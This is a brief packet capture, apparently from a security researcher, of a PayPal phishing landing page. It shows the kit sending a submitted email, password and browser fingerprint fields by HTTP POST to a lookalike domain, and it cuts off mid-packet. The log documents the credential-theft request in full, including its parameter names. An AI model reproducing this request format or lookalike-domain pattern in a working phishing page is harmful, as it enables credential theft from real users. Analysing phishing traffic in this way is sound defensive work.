PayPal Phishing landing page:   Stealing Credentials Traffic:   2017-04-17 22:00:47.498090 IP 192.168.1.100.46042 > 184.154.127.226.80: Flags [P.], seq 1:785, ack 1, win 229, options [nop,nop,TS val 1037083633 ecr 3076619526], length 784: HTTP: POST /inc/login.php HTTP/1.1 E..D..@.@..W…d…….P…2..a]……….. =….a}.POST /inc/login.php HTTP/1.1 Host: www.paypal.com4uswebappsresetaccountrecovery.timeseaways.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://www.paypal.com4uswebappsresetaccountrecovery.timeseaways.com/ Content-Length: 285 Connection: keep-alive user=johnny5alive%40gmail.com&pass=johnny5alive&xBrowser=Mozilla+FireFox+v43&xOperatingSystem=Linux&xPlatForm=Desktop+Platform&xTimeZone=Mon+Apr+17+2017+22%3A00%3A35+GMT-0400+(EDT)&xResoLution=Computer%3A+1920×1080%3B+Browser+inner%3A+1920×762%3B+Browser+outer%3A+1920×1027&xLang=en-US 2017-04-17 22:00:47.557561 IP 184.154.127.226.80 > 192.168.1.100.46042: Flags [.], ack 785, win 239, options [nop,nop,TS val 3076619602 ecr 1037083633], length 0 E..4..@.4.0,…….d.P….a]..  B….   …… .a}R=… 2017-04-17 22:00:48.036469 IP 192.168.1.100.47166 > 52.22.15.101.443: Flags […]